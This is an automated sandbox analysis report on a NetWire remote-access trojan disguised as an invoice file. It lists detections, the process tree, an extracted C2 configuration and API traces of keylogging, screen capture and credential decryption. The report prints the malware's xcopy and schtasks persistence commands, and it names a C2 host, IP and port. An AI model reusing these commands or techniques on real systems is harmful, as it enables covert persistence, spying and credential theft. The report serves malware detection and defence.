Play interactive tour

Edit tour

Windows Analysis Report important invoice presentation nov 2021.pif

Overview

General Information

Sample Name:	important invoice presentation nov 2021.pif (renamed file extension from pif to exe)
Analysis ID:	523630
MD5:	1364844e0bfb349272c5050fb0e677e3
SHA1:	ffc57ad66c9a3764a88a2b2c3ec1f0f19042c77a
SHA256:	004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730
Infos:
Most interesting Screenshot:

Detection

NetWire

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	46
Range:	0 - 100

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected NetWire RAT

Sigma detected: Copying Sensitive Files with Credential Data

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Initial sample is a PE file and has a suspicious name

Found evasive API chain (may stop execution after checking mutex)

Writes to foreign memory regions

Contains functionality to log keystrokes

Found stalling execution ending in API Sleep call

Sigma detected: Xwizard DLL Sideloading

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Abnormal high CPU Usage

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Potential key logger detected (key state polling based)

Found evasive API chain (may stop execution after accessing registry keys)

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Classification

Process Tree

System is w10x64

important invoice presentation nov 2021.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" MD5: 1364844E0BFB349272C5050FB0E677E3)

cmd.exe (PID: 3576 cmdline: cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

xcopy.exe (PID: 6100 cmdline: xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 5536 cmdline: cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5660 cmdline: schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f MD5: 15FF7D8324231381BAD48A052F85DF04)

xwizard.exe (PID: 5612 cmdline: C:\Windows\System32\xwizard.exe MD5: 17059CA3DDD41B52DE4140705B38AE53)

important invoice presentation nov 2021.exe (PID: 2872 cmdline: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe MD5: 1364844E0BFB349272C5050FB0E677E3)

cmd.exe (PID: 5704 cmdline: cmd /c xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

xcopy.exe (PID: 4920 cmdline: xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 3032 cmdline: cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2032 cmdline: schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f MD5: 15FF7D8324231381BAD48A052F85DF04)

xwizard.exe (PID: 2040 cmdline: C:\Windows\System32\xwizard.exe MD5: 17059CA3DDD41B52DE4140705B38AE53)

cleanup

Malware Configuration

Threatname: NetWire

{"C2 list": ["calibare5454.pro:3360"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "wAnRkHLX", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x580:$v1: HostId-%Rand%
00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
0000000D.00000002.683551594.000000001CF00000.00000040.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: important invoice presentation nov 2021.exe PID: 6968	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: important invoice presentation nov 2021.exe PID: 2872	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: xwizard.exe PID: 5612	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: xwizard.exe PID: 2040	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: xwizard.exe PID: 2040	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x107c9:$v1: HostId-%Rand% 0x107df:$v1: HostId-%Rand%
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.important invoice presentation nov 2021.exe.1c8f0000.1.raw.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
14.2.xwizard.exe.400000.0.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
13.2.important invoice presentation nov 2021.exe.1cf00000.1.raw.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
30.2.xwizard.exe.400000.0.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
30.2.xwizard.exe.400000.0.unpack	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x20f80:$v1: HostId-%Rand%

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q , CommandLine: cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q , CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" , ParentImage: C:\Users\user\Desktop\important invoice presentation nov 2021.exe, ParentProcessId: 6968, ProcessCommandLine: cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q , ProcessId: 3576

Sigma detected: Xwizard DLL Sideloading

Show sources

Source: Process started

Author: Christian Burkard: Data: Command: C:\Windows\System32\xwizard.exe, CommandLine: C:\Windows\System32\xwizard.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" , ParentImage: C:\Users\user\Desktop\important invoice presentation nov 2021.exe, ParentProcessId: 6968, ProcessCommandLine: C:\Windows\System32\xwizard.exe, ProcessId: 5612

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp

Malware Configuration Extractor: NetWire {"C2 list": ["calibare5454.pro:3360"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "wAnRkHLX", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}

Source: 30.2.xwizard.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 14.2.xwizard.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen

Cryptography:

Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040C4B7 RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegCloseKey,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegCloseKey,RegCloseKey,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	14_2_0040C4B7
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040E511 CryptUnprotectData,LocalFree,	14_2_0040E511
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040EDD6 fopen,malloc,fclose,fread,fclose,CryptUnprotectData,sprintf,strcmp,strcmp,	14_2_0040EDD6
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040D290 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	14_2_0040D290
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040C4B7 RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegCloseKey,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegCloseKey,RegCloseKey,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	30_2_0040C4B7
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040E511 CryptUnprotectData,LocalFree,	30_2_0040E511
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040EDD6 fopen,malloc,fclose,fread,fclose,CryptUnprotectData,sprintf,strcmp,strcmp,	30_2_0040EDD6
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040D290 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	30_2_0040D290

Compliance:

Uses 32bit PE files

Show sources

Source: important invoice presentation nov 2021.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

PE / OLE file has a valid certificate

Show sources

Source: important invoice presentation nov 2021.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: important invoice presentation nov 2021.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Spreading:

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BD655F __EH_prolog3_GS,GetFullPathNameA,__cftof,_strlen,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,_strlen,	13_2_00BD655F
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406453 MultiByteToWideChar,SetErrorMode,FindFirstFileW,FileTimeToSystemTime,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	14_2_00406453
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040680D SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,FindNextFileW,	14_2_0040680D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040753D MultiByteToWideChar,SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,MultiByteToWideChar,wcscat,WideCharToMultiByte,FindNextFileW,	14_2_0040753D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00413A85 SetErrorMode,MultiByteToWideChar,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	14_2_00413A85
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DB1C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,	14_2_0040DB1C
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406F83 SetErrorMode,FindFirstFileA,strcmp,strcmp,strcat,fopen,strncpy,fclose,strcpy,FindNextFileA,FindClose,	14_2_00406F83
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406390 FindFirstFileW,fopen,_snwprintf,fwprintf,_snwprintf,FindNextFileW,FindClose,fclose,	14_2_00406390
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406453 MultiByteToWideChar,SetErrorMode,FindFirstFileW,FileTimeToSystemTime,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	30_2_00406453
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040680D SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,FindNextFileW,	30_2_0040680D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040753D MultiByteToWideChar,SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,MultiByteToWideChar,wcscat,WideCharToMultiByte,FindNextFileW,	30_2_0040753D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00413A85 SetErrorMode,MultiByteToWideChar,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	30_2_00413A85
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DB1C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,	30_2_0040DB1C
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406F83 SetErrorMode,FindFirstFileA,strcmp,strcmp,strcat,fopen,strncpy,fclose,strcpy,FindNextFileA,FindClose,	30_2_00406F83
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406390 FindFirstFileW,fopen,_snwprintf,fwprintf,_snwprintf,FindNextFileW,FindClose,fclose,	30_2_00406390

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00406084 SetErrorMode,GetLogicalDriveStringsA,GetVolumeInformationA,GetDiskFreeSpaceExA,GetDriveTypeA,

14_2_00406084

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: calibare5454.pro:3360

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

IP Address: 51.195.57.233 51.195.57.233

Source: global traffic

TCP traffic: 192.168.2.6:49777 -> 51.195.57.233:3360

Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: important invoice presentation nov 2021.exe	String found in binary or memory: http://www.xnview.com
Source: xwizard.exe	String found in binary or memory: http://www.yandex.com
Source: important invoice presentation nov 2021.exe, 00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp, important invoice presentation nov 2021.exe, 0000000D.00000002.683551594.000000001CF00000.00000040.00000001.sdmp, xwizard.exe, 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp, xwizard.exe, 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp	String found in binary or memory: http://www.yandex.comsocks=
Source: important invoice presentation nov 2021.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: important invoice presentation nov 2021.exe	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown

DNS traffic detected: queries for: calibare5454.pro

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00405FBE recv,WSAGetLastError,

14_2_00405FBE

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes

Show sources

Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00409953 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyW,ToUnicode,WideCharToMultiByte,GetKeyState,MapVirtualKeyW,GetKeyNameTextW,GetKeyState,WideCharToMultiByte,		14_2_00409953
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00409953 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyW,ToUnicode,WideCharToMultiByte,GetKeyState,MapVirtualKeyW,GetKeyNameTextW,GetKeyState,WideCharToMultiByte,		30_2_00409953

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00411D8C GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetDIBits,calloc,GetDIBits,ReleaseDC,DeleteDC,DeleteObject,free,

14_2_00411D8C

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BBA38E GetKeyState,GetKeyState,GetKeyState,SendMessageA,	13_2_00BBA38E
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00409953 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyW,ToUnicode,WideCharToMultiByte,GetKeyState,MapVirtualKeyW,GetKeyNameTextW,GetKeyState,WideCharToMultiByte,	14_2_00409953
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00409953 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyW,ToUnicode,WideCharToMultiByte,GetKeyState,MapVirtualKeyW,GetKeyNameTextW,GetKeyState,WideCharToMultiByte,	30_2_00409953

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BF8181 __EH_prolog3,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

13_2_00BF8181

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 30.2.xwizard.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp, type: MEMORY	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: xwizard.exe PID: 2040, type: MEMORYSTR	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: important invoice presentation nov 2021.exe

Source: important invoice presentation nov 2021.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 30.2.xwizard.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp, type: MEMORY	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: xwizard.exe PID: 2040, type: MEMORYSTR	Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00B9E230	13_2_00B9E230
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BBAA7C	13_2_00BBAA7C
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BE106A	13_2_00BE106A
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00403047	14_2_00403047
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0041D049	14_2_0041D049
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00419463	14_2_00419463
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00415079	14_2_00415079
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00420420	14_2_00420420
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_004208C0	14_2_004208C0
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_004034D3	14_2_004034D3
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00414976	14_2_00414976
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00402E68	14_2_00402E68
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00416619	14_2_00416619
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040AEC6	14_2_0040AEC6
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00402AFC	14_2_00402AFC
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00415ABF	14_2_00415ABF
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00420F40	14_2_00420F40
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0041FF50	14_2_0041FF50
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040A728	14_2_0040A728
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00403047	30_2_00403047
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0041D049	30_2_0041D049
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00419463	30_2_00419463
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00415079	30_2_00415079
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00420420	30_2_00420420
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_004208C0	30_2_004208C0
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_004034D3	30_2_004034D3
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00414976	30_2_00414976
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00402E68	30_2_00402E68
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00416619	30_2_00416619
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040AEC6	30_2_0040AEC6
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00402AFC	30_2_00402AFC
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00415ABF	30_2_00415ABF
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00420F40	30_2_00420F40
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0041FF50	30_2_0041FF50
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040A728	30_2_0040A728

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: String function: 00D59920 appears 36 times
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: String function: 00D597E9 appears 54 times
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: String function: 00B9F800 appears 31 times
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: String function: 00D597B6 appears 167 times

Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00CC161A LocalAlloc,GetSystemInfo,NtQueryVirtualMemory,LocalFree,		14_2_00CC161A
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00CC161A LocalAlloc,GetSystemInfo,NtQueryVirtualMemory,		30_2_00CC161A

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process Stats: CPU usage > 98%
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process Stats: CPU usage > 98%

Source: important invoice presentation nov 2021.exe, 00000001.00000000.336774909.000000000150B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamexnviewmp.exeL vs important invoice presentation nov 2021.exe
Source: important invoice presentation nov 2021.exe, 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamexnviewmp.exeL vs important invoice presentation nov 2021.exe
Source: important invoice presentation nov 2021.exe	Binary or memory string: OriginalFilenamexnviewmp.exeL vs important invoice presentation nov 2021.exe

Source: important invoice presentation nov 2021.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: important invoice presentation nov 2021.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: important invoice presentation nov 2021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\important invoice presentation nov 2021.exe "C:\Users\user\Desktop\important invoice presentation nov 2021.exe"
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f
Source: unknown	Process created: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe
